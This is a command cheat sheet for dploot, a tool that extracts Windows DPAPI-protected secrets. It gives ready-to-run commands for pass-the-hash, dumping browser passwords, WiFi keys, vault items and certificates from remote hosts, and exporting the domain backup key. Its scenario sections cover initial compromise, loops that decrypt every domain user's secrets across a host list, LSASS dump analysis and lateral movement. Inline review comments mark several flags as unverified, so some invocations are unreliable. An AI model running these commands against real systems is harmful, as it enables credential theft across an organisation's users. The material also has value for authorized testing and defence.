dploot is a powerful Python-based tool for extracting Windows DPAPI-protected secrets in domain environments. It can loot browser passwords, WiFi credentials, vault entries, certificates, and other sensitive data by leveraging domain credentials or compromised systems. Essential for post-exploitation and credential extraction scenarios.
# Prerequisite checks: dploot is a Python tool, so a Python 3 interpreter and pip must be present
# Python 3.7 or higher
python3 --version
# pip package manager
pip3 --version
# For domain operations: impacket library
pip3 install impacket
# For DPAPI decryption capabilities
pip3 install pycryptodome
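# Fetch the source and move into the checkout. The `cd` is checked: if the clone
# failed (or produced a differently named directory), an unchecked `cd` would leave
# every following command running in the wrong directory.
git clone https://github.com/zblurx/dploot.git
cd dploot || exit 1
# Install all required packages
pip3 install -r requirements.txt
# Core dependencies (presumably already listed in requirements.txt — verify before keeping this duplicate step)
pip3 install impacket pycryptodome
# Confirm the install: usage text and version should print without errors
python3 dploot.py --help
python3 dploot.py --version
# Test basic functionality
python3 dploot.py triage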
# Authentication options. A password given on the command line is visible in the
# shell history and, via process listings, to other local users; the interactive
# prompt forms below avoid that.
# Local domain credentials
dploot.py -u username -p password -d DOMAIN target_host
# NTHash (pass-the-hash); the leading ':' presumably follows the impacket LMHASH:NTHASH form with an empty LM part — verify
dploot.py -u username --hashes :NTHASH target_host
# Kerberos ticket: KRB5CCNAME names the credential cache file to use.
# /tmp is shared with every local user — keep the cache file's permissions restrictive.
KRB5CCNAME=/tmp/ticket.ccache dploot.py -k target_host
# Prompt for password interactively
# NOTE(review): `-p` with no value immediately followed by `-d` may be parsed as the
# literal password "-d" by the option parser — confirm against `dploot.py --help`.
dploot.py -u username -p -d DOMAIN target_host
# Prompt for domain interactively
dploot.py -u username -p -d - target_host
# Alternative secret sources: local machine, a saved LSASS dump, or key files
# Local system (requires local admin)
dploot.py local-triage
# LSASS dump file analysis (the saved dump is passed as a positional argument)
dploot.py lsass dump.bin
# Use cached masterkeys (-m takes a masterkey file)
dploot.py -m masterkey.key target_host
# Use domain backup key (-b takes the backup key file)
dploot.py -b backup_key.bin target_host
# Specify multiple keys (repeat -m once per file)
dploot.py -m key1.bin -m key2.bin target_host
# Full local system analysis (requires admin) — same invocation as the
# "Local system" example above
dploot.py local-triage
# Save output to file
dploot.py local-triage -o output.json
# Include verbose details
dploot.py local-triage -v
# Specific credential type (one flag per source)
dploot.py local-triage --chrome
dploot.py local-triage --wifi
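# Triage remote system
dploot.py -u user -p pass -d DOMAIN target_host triage
# Export triage results
dploot.py -u user -p pass target_host triage -o triage_results.json
# Triage multiple hosts. The loop variable is the target: the original passed the
# literal `target_host` on every iteration, so the three hosts were never visited.
# The expansion is quoted so a hostname can never be word-split or glob-expanded.
for host in host1 host2 host3; do
  dploot.py -u user -p pass "$host" triage
done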
# Returns discovered:
# - Browser profiles and history
# - Vault items
# - WiFi networks
# - Certificates
# - Recent files
# - Network shares
# - Process information
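# Extract all Chrome passwords
dploot.py -u user -p pass target_host chrome
# Export to JSON
dploot.py -u user -p pass target_host chrome -o chrome_creds.json
# Specific profile. `-p` is already the password option on this command line, so the
# profile directory is passed with --profile (the flag the firefox example on this page
# uses — confirm the name with `dploot.py chrome --help`). Single quotes keep the
# Windows backslashes literal.
dploot.py -u user -p pass target_host chrome --profile 'C:\Users\username\AppData\Local\Google\Chrome\User Data'
# Verbose output with decryption details
dploot.py -u user -p pass target_host chrome -v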
# Extract Firefox passwords
dploot.py -u user -p pass target_host firefox
# Specific profile path (--profile takes the profile directory; inside double quotes
# bash keeps a backslash literal unless it precedes $, `, ", \ or a newline)
dploot.py -u user -p pass target_host firefox --profile "C:\Users\username\AppData\Roaming\Mozilla\Firefox"
# Extract Edge credentials
dploot.py -u user -p pass target_host edge
# Internet Explorer (older systems)
dploot.py -u user -p pass target_host iexplore
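# Extract WiFi passwords
dploot.py -u user -p pass target_host wifi
# Show detailed WiFi network info
dploot.py -u user -p pass target_host wifi -v
# Export to CSV. The option table on this page lists -f as the format selector, so it is
# given explicitly rather than relying on the .csv extension (same form as the
# `-f csv` example in the output-format section).
dploot.py -u user -p pass target_host wifi -f csv -o wifi_creds.csv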
# Extract Windows Vault items
dploot.py -u user -p pass target_host vault
# Vault for specific user (--user selects whose vault is read)
dploot.py -u user -p pass target_host vault --user targetuser
# Include vault passwords (without this flag, presumably only entry metadata is listed — verify)
dploot.py -u user -p pass target_host vault --include-passwords
# Extract system certificates
dploot.py -u user -p pass target_host certs
# Export certificates to PEM (-o is given a directory path here, not a single file)
dploot.py -u user -p pass target_host certs -o certs/
# Personal store certificates
dploot.py -u user -p pass target_host certs --store Personal
# Machine vs user certs (--machine / --user select which certificate scope is read)
dploot.py -u user -p pass target_host certs --machine
dploot.py -u user -p pass target_host certs --user
# Masterkey extraction. Files produced here can be fed back through the
# -m / -b options used elsewhere on this page.
# Extract local system masterkeys
dploot.py local-masterkeys
# Save masterkeys to file
dploot.py local-masterkeys -o masterkeys.bin
# Verbose masterkey discovery
dploot.py local-masterkeys -v
# Extract domain backup key (requires domain admin)
dploot.py -u admin -p pass -d DOMAIN backup-key
# Use backup key to decrypt masterkeys
dploot.py -b backup_key.bin target_host masterkeys
# Extract masterkeys from LSASS
dploot.py lsass dump.bin masterkeys
# User masterkey folder
C:\Users\username\AppData\Roaming\Microsoft\Protect\{SID}
# System masterkey folder
C:\ProgramData\Microsoft\Protect\S-1-5-18
# Export DPAPI domain backup key (same command as the backup-key example in the
# masterkey section; requires domain admin)
dploot.py -u domainadmin -p password -d DOMAIN backup-key
# Save to file. The exported key decrypts every domain user's DPAPI secrets, so the
# file is itself a domain-wide secret — see the storage notes at the end of this page.
dploot.py -u domainadmin -p password -d DOMAIN backup-key -o dpapi_backup_key.bin
# Via LDAP
dploot.py -u domainadmin -p password -d DOMAIN ldap backup-key
# Decrypt DPAPI blobs with backup key
dploot.py -b dpapi_backup_key.bin target_host chrome
# Decrypt all credentials
dploot.py -b dpapi_backup_key.bin target_host all
# Extract and decrypt in one command
dploot.py -b backup_key.bin target_host triage
# Machine-level enumeration: one subcommand per area, all using the same
# credential/target prefix
# Complete machine triage
dploot.py -u user -p pass target_host machine-triage
# Save detailed report
dploot.py -u user -p pass target_host machine-triage -o machine_report.json
# System information
dploot.py -u user -p pass target_host sysinfo
# Process enumeration
dploot.py -u user -p pass target_host processes
# Network configuration
dploot.py -u user -p pass target_host network
# Scheduled tasks
dploot.py -u user -p pass target_host tasks
# Services
dploot.py -u user -p pass target_host services
# User-level enumeration subcommands
# User profile triage
dploot.py -u user -p pass target_host user-triage
# Specific user triage (--target-user names the profile to inspect)
dploot.py -u user -p pass target_host user-triage --target-user admin
# All users on system
dploot.py -u user -p pass target_host user-triage --all-users
# Get user profiles
dploot.py -u user -p pass target_host users
# User home directories
dploot.py -u user -p pass target_host user-homes
# User environment variables
dploot.py -u user -p pass target_host user-env
# Scenario: credential collection from a single host
# 1. Gain initial access (via exploit, phishing, etc.)
# 2. Execute dploot from compromised system
# Quick credentials grab. Each command authenticates to target_host on its own,
# so presumably each one leaves its own authentication/logon event on the target.
dploot.py -u compromised_user -p password -d DOMAIN target_host chrome
dploot.py -u compromised_user -p password -d DOMAIN target_host wifi
dploot.py -u compromised_user -p password -d DOMAIN target_host vault
# 3. Use extracted credentials for lateral movement
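# 1. Compromise domain admin account
# 2. Extract domain backup key
dploot.py -u da_user -p da_pass -d DOMAIN backup-key -o da_backup_key.bin
# 3. Use backup key to decrypt ALL domain user secrets
# Read hostlist.txt into an array instead of `for host in $(cat ...)`: that form
# word-splits and glob-expands the file contents. Every expansion is quoted so a
# hostname is never split or globbed, and mapfile leaves stdin untouched for dploot.py.
mapfile -t hosts < hostlist.txt
for host in "${hosts[@]}"; do
  [[ -n "$host" ]] || continue   # skip blank lines, which the unquoted form silently dropped
  dploot.py -b da_backup_key.bin "$host" triage -o "${host}_triage.json"
done
# 4. Extract browser passwords, WiFi creds from all systems
for host in "${hosts[@]}"; do
  [[ -n "$host" ]] || continue
  dploot.py -b da_backup_key.bin "$host" chrome -o "${host}_chrome.json"
  dploot.py -b da_backup_key.bin "$host" wifi -o "${host}_wifi.json"
done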
# Scenario: analysis of a saved LSASS dump. No target host appears in steps 2-4;
# the dump file is the sole input to each command.
# 1. Dump LSASS from target (requires local admin)
# Using ppldump, lsassy, comsvcs.dll, etc.
# 2. Analyze LSASS dump
dploot.py lsass ./lsass_dump.bin masterkeys
# 3. Extract credentials using dump
dploot.py lsass ./lsass_dump.bin chrome
# 4. Decrypt vault items
dploot.py lsass ./lsass_dump.bin vault
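# Discover all user accounts on target
dploot.py -u user -p pass target_host users
# Dump all credentials
dploot.py -u user -p pass target_host all
# Export to offline analysis
dploot.py -u user -p pass target_host triage -o audit.json
# Analyze for compromised accounts, weak passwords, etc.
# grep reads the file directly (the `cat |` pipe was redundant); `--` ends option
# parsing so a pattern beginning with '-' cannot be taken as a flag.
grep -i -- password audit.json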
# Output formats and verbosity
# Export to structured JSON
dploot.py -u user -p pass target_host chrome -o output.json
# Pretty-print JSON
# NOTE(review): --pretty is not in the option table below — confirm with `dploot.py chrome --help`
dploot.py -u user -p pass target_host chrome -o output.json --pretty
# WiFi credentials as CSV (-f selects the format, -o the destination file)
dploot.py -u user -p pass target_host wifi -f csv -o wifi.csv
# Explicit JSON format (the option table lists json, csv and txt for -f)
dploot.py -u user -p pass target_host chrome -f json -o creds.json
# Default: Display results in terminal
dploot.py -u user -p pass target_host chrome
# Verbose output
dploot.py -u user -p pass target_host chrome -v
# Very verbose (debug)
dploot.py -u user -p pass target_host chrome -vv
| Option | Purpose |
|---|---|
| -u | Username for authentication |
| -p | Password (or prompt if blank) |
| -d | Domain name |
| --hashes | NTHash for pass-the-hash |
| -b | Domain backup key file path |
| -m | Masterkey file path |
| -o | Output file path |
| -f | Output format (json, csv, txt) |
| -v | Verbose output |
| --timeout | Connection timeout in seconds |
| --no-ssl | Disable SSL verification |
| -k | Use Kerberos authentication |
# Target formats: a hostname, an IP address or an FQDN all go in the same positional slot
dploot.py -u user -p pass target_host chrome
dploot.py -u user -p pass 192.168.1.100 chrome
dploot.py -u user -p pass SERVER01.domain.local chrome
dploot.py -u user -p pass server01.corp.internal chrome
| Issue | Solution |
|---|---|
| "Authentication failed" | Verify credentials; ensure the account has the necessary permissions |
| "DPAPI blob decryption failed" | The domain backup key may be needed; try with the -b option |
| "Connection refused" | Verify the target is online, firewall rules, and that SMB/RPC ports are open |
| "Access denied to masterkeys" | The user may lack permissions; try with a higher-privileged account |
| "No credentials found" | Browser/vault may be locked; try triage mode first |
| "Masterkey not found" | Local masterkeys missing; use the domain backup key approach |
- Always obtain proper authorization before running dploot
- Use domain admin backup key extraction carefully in production
- Document all extracted credentials for audit purposes
- Store exported credential files securely
- Use encryption for sensitive output files
- Rotate compromised credentials immediately
- Monitor for dploot usage in security logs (Event IDs 4648 and 5140)
- Test in lab environment before production deployment
- Keep dploot updated for latest DPAPI attack techniques
- Use with caution in compliance-sensitive environments (PCI, HIPAA, etc.)
# Help for specific commands (a subcommand followed by --help shows that subcommand's options)
dploot.py --help
dploot.py chrome --help
dploot.py vault --help
# Check version and dependencies
dploot.py --version
pip3 show impacket